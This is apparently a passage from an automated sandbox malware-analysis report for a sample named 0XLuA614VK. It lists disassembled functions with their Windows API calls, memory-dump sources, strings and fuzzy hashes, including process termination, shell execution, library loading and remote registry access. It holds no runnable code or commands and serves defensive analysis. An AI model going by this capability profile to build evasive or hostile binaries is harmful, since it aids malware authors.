                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: f90ddfca3a649a7bb67af3bcf3915859b4e2f743a80ef65a0819d63e9a1c1220
                                                      • Instruction ID: 5df69644e24aceadd9e0b154148577e43074889082b9dde1fb3be5c514491560
                                                      • Opcode Fuzzy Hash: f90ddfca3a649a7bb67af3bcf3915859b4e2f743a80ef65a0819d63e9a1c1220
                                                      • Instruction Fuzzy Hash: B90144B0902B5ABDE3008F6A8C85A52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                      Function 00F8EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F8EB30
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F8EB46
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00F8EB55
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F8EB64
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F8EB6E
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F8EB75
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: f5db17b92fc5b33e79b0ceea652de4b98826ebb0a9a7f8eb230ed60d1859c730
                                                      • Instruction ID: 4137a82b268d167cdad6cd23bd551ba3f9fda5a10751f87e270fb4e5037846ff
                                                      • Opcode Fuzzy Hash: f5db17b92fc5b33e79b0ceea652de4b98826ebb0a9a7f8eb230ed60d1859c730
                                                      • Instruction Fuzzy Hash: D8F0307254015CBBE7215B529C4DEEF3B7CEFCAB11F000259F641E1091E7A05A01EAF5
                                                      Function 00F77439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClientRect.USER32(?), ref: 00F77452
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F77469
                                                      • GetWindowDC.USER32(?), ref: 00F77475
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00F77484
                                                      • ReleaseDC.USER32(?,00000000), ref: 00F77496
                                                      • GetSysColor.USER32(00000005), ref: 00F774B0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                      • String ID:
                                                      • API String ID: 272304278-0
                                                      • Opcode ID: d38e165e711e8dc3aec90a2b9372761d7693b50068bdef6a7abda02928e10d59
                                                      • Instruction ID: 1113beab4dcbbd590256bb93dae4c41ed374b4250d1cfaa213a99b67c68c59c2
                                                      • Opcode Fuzzy Hash: d38e165e711e8dc3aec90a2b9372761d7693b50068bdef6a7abda02928e10d59
                                                      • Instruction Fuzzy Hash: F5018B32800209EFDB10AF64DC48FAA7BB6FF04321F654264F919A20A0CB311E41FF91
                                                      Function 00F81874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F8187F
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00F8188B
                                                      • CloseHandle.KERNEL32(?), ref: 00F81894
                                                      • CloseHandle.KERNEL32(?), ref: 00F8189C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F818A5
                                                      • HeapFree.KERNEL32(00000000), ref: 00F818AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 76bd6cb15ac26c14d24cf2007d67f299e12dd1349acc256190ef7d50ea488552
                                                      • Instruction ID: 640e69d8d407b9372ea40d2fd44ab870e39531d94c4becdc936efd42b79bb1fa
                                                      • Opcode Fuzzy Hash: 76bd6cb15ac26c14d24cf2007d67f299e12dd1349acc256190ef7d50ea488552
                                                      • Instruction Fuzzy Hash: 8DE0E576004109BBEB015FA6ED4C90BBF79FF49B22B508321F26591071CB329420EFA0
                                                      Function 00F8C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F27620: _wcslen.LIBCMT ref: 00F27625
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F8C6EE
                                                      • _wcslen.LIBCMT ref: 00F8C735
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F8C79C
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F8C7CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                      • String ID: 0
                                                      • API String ID: 1227352736-4108050209
                                                      • Opcode ID: c5b6c5f598c80964dc121b972b7a16950f5c0dbac3b6b19946fef5de197ea13b
                                                      • Instruction ID: 153aed76e5bb88c44c1cafb1ccb0530d00d8db43b5e030c3be2befd566f76a22
                                                      • Opcode Fuzzy Hash: c5b6c5f598c80964dc121b972b7a16950f5c0dbac3b6b19946fef5de197ea13b
                                                      • Instruction Fuzzy Hash: 7D51B171A143019BD714AF28CC85BAF77E8AF49320F040A29FA95D31A1DB74D944FBE2
                                                      Function 00FAAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00FAAEA3
                                                        • Part of subcall function 00F27620: _wcslen.LIBCMT ref: 00F27625
                                                      • GetProcessId.KERNEL32(00000000), ref: 00FAAF38
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAAF67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                      • String ID: <$@
                                                      • API String ID: 146682121-1426351568
                                                      • Opcode ID: 9a89b4107aa4efde64f4e8993ff29d68dd89ad2ddab89ed64ec8c37941cf7431
                                                      • Instruction ID: bacecbda88fd3974c8b0cf4b4bf16525b1b5dd1cf050f334cc7994de1c8bde66
                                                      • Opcode Fuzzy Hash: 9a89b4107aa4efde64f4e8993ff29d68dd89ad2ddab89ed64ec8c37941cf7431
                                                      • Instruction Fuzzy Hash: 4371ACB1A00628DFCB14EF54D885A9EBBF0FF09310F048499E816AB352C778ED45EB91
                                                      Function 00F8719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F87206
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F8723C
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F8724D
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F872CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 1f16bc7c4c16666601a7f6f499172ae42b6b256b861f591dff6336a08b926586
                                                      • Instruction ID: 8784e8c4709a4ba42e77b556f673d590499fb18c26b4a325a960dd2f4d049ca8
                                                      • Opcode Fuzzy Hash: 1f16bc7c4c16666601a7f6f499172ae42b6b256b861f591dff6336a08b926586
                                                      • Instruction Fuzzy Hash: D7416171A04308EFDB15EF54C884BDA7BA9EF84310F2480A9BD059F25AD7B5D944EFA0
                                                      Function 00FB2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FB2F8D
                                                      • LoadLibraryW.KERNEL32(?), ref: 00FB2F94
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FB2FA9
                                                      • DestroyWindow.USER32(?), ref: 00FB2FB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                      • String ID: SysAnimate32
                                                      • API String ID: 3529120543-1011021900
                                                      • Opcode ID: ce884f1c3b4f4d8b6f48d681895bb12e7486df31502eca9b5881ed872dbe3260
                                                      • Instruction ID: 4e1aa3f676828a7799c3bb51322137e1ed1e6af9def5059d6b3092b578ddd5ce
                                                      • Opcode Fuzzy Hash: ce884f1c3b4f4d8b6f48d681895bb12e7486df31502eca9b5881ed872dbe3260
                                                      • Instruction Fuzzy Hash: 81218872A00209ABEB509E66DC84EBB37B9EB59374F100218F950D61A0D771DC51BBA0
                                                      Function 00F44D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F44D1E,00F528E9,?,00F44CBE,00F528E9,00FE88B8,0000000C,00F44E15,00F528E9,00000002), ref: 00F44D8D
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F44DA0
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00F44D1E,00F528E9,?,00F44CBE,00F528E9,00FE88B8,0000000C,00F44E15,00F528E9,00000002,00000000), ref: 00F44DC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 97ddecda3c36f76450b8b26f525654de72bc9bcf00c5e04bb9ee9e42b19cbb92
                                                      • Instruction ID: 2c1b31ce1e76aeb6a54389e2df078939a1e9ccda9af6f69750c83f472d78ffde
                                                      • Opcode Fuzzy Hash: 97ddecda3c36f76450b8b26f525654de72bc9bcf00c5e04bb9ee9e42b19cbb92
                                                      • Instruction Fuzzy Hash: 3BF0313594020CABDB159F94DC49B9EBFB5EF44751F040159FD05A2150CB749941EED1
                                                      Function 00F24E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F24EDD,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E9C
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F24EAE
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F24EDD,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24EC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-3689287502
                                                      • Opcode ID: 261f4c61ba628c6fbb3357949b0dd2ac622e9041f6495601ccb6d3e15c7c0113
                                                      • Instruction ID: 63070fe59ae6e8e305a8864317dc87e75dd59edf68b6eb6ae5401a34abef872a
                                                      • Opcode Fuzzy Hash: 261f4c61ba628c6fbb3357949b0dd2ac622e9041f6495601ccb6d3e15c7c0113
                                                      • Instruction Fuzzy Hash: C5E08635E02A325BA2311B29FC1CA5F7558AF81F727060215FC00E3200DBE0DD0268E1
                                                      Function 00F24E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F63CDE,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E62
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F24E74
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F63CDE,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E87
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-1355242751
                                                      • Opcode ID: 89700fb15f60eba1921fff8f7eac37fe4e992fdb158560e636b9fe5b254d1818
                                                      • Instruction ID: 668b9a0eadb6c16cc761c2b7b8b84fd916b58c7c645015987da8d8bc85d2fb02
                                                      • Opcode Fuzzy Hash: 89700fb15f60eba1921fff8f7eac37fe4e992fdb158560e636b9fe5b254d1818
                                                      • Instruction Fuzzy Hash: 11D01235902A32576A221B29BC1CD8F7A18AF85B653064615F905B7124CFA0DD02B9E1
                                                      Function 00FAA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 00FAA427
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FAA435
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FAA468
                                                      • CloseHandle.KERNEL32(?), ref: 00FAA63D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                      • String ID:
                                                      • API String ID: 3488606520-0
                                                      • Opcode ID: 7c3cd127402baa294107407f128c3c7988a48f465daf7ecd7053a47004726466
                                                      • Instruction ID: 0e58a1250b2cf1aea104e67fc4be2922ae76728edb073f2b09a592913f0f71e9
                                                      • Opcode Fuzzy Hash: 7c3cd127402baa294107407f128c3c7988a48f465daf7ecd7053a47004726466
                                                      • Instruction Fuzzy Hash: FCA1A1B16043009FD720DF24D886F2AB7E5AF88724F14881DF95A9B392DB74EC45DB92
                                                      Function 00F5BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FC3700), ref: 00F5BB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00FF121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F5BC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00FF1270,000000FF,?,0000003F,00000000,?), ref: 00F5BC36
                                                      • _free.LIBCMT ref: 00F5BB7F
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F5BD4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 1286116820-0
                                                      • Opcode ID: e67ec75648d556147230dcbd9594b147e77b1142f3758e2c4cb0b0754033558c
                                                      • Instruction ID: fc7cfc09bf23fc825c4eda0b1e9f10def3b2e54edf5d86182f82a8bbea67b266
                                                      • Opcode Fuzzy Hash: e67ec75648d556147230dcbd9594b147e77b1142f3758e2c4cb0b0754033558c
                                                      • Instruction Fuzzy Hash: 7851E971D0020DEFC710DFA59C859BAB7BCBF41321B10026AEA50E71A1EB705D49FB90
                                                      Function 00F8E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F8CF22,?), ref: 00F8DDFD
                                                        • Part of subcall function 00F8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F8CF22,?), ref: 00F8DE16
                                                        • Part of subcall function 00F8E199: GetFileAttributesW.KERNEL32(?,00F8CF95), ref: 00F8E19A
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00F8E473
                                                      • MoveFileW.KERNEL32(?,?), ref: 00F8E4AC
                                                      • _wcslen.LIBCMT ref: 00F8E5EB
                                                      • _wcslen.LIBCMT ref: 00F8E603
                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F8E650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                      • String ID:
                                                      • API String ID: 3183298772-0
                                                      • Opcode ID: 26f2c23c8d5095f12b671739697d6c793c5b11927bbc1eb2eea76891b2471720
                                                      • Instruction ID: b6d45496ffe48e2cbe7ce93890853d608bc7bfd1b52aa8e97b8ba7a4a4c41326
                                                      • Opcode Fuzzy Hash: 26f2c23c8d5095f12b671739697d6c793c5b11927bbc1eb2eea76891b2471720
                                                      • Instruction Fuzzy Hash: 045184B24083455BC724EBA0DC819DF77DCAF84350F00492EF589D3191EF78E6889B66
                                                      Function 00FAB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00FAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FAB6AE,?,?), ref: 00FAC9B5
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FAC9F1
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA68
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FABAA5
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FABB00
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00FABB63
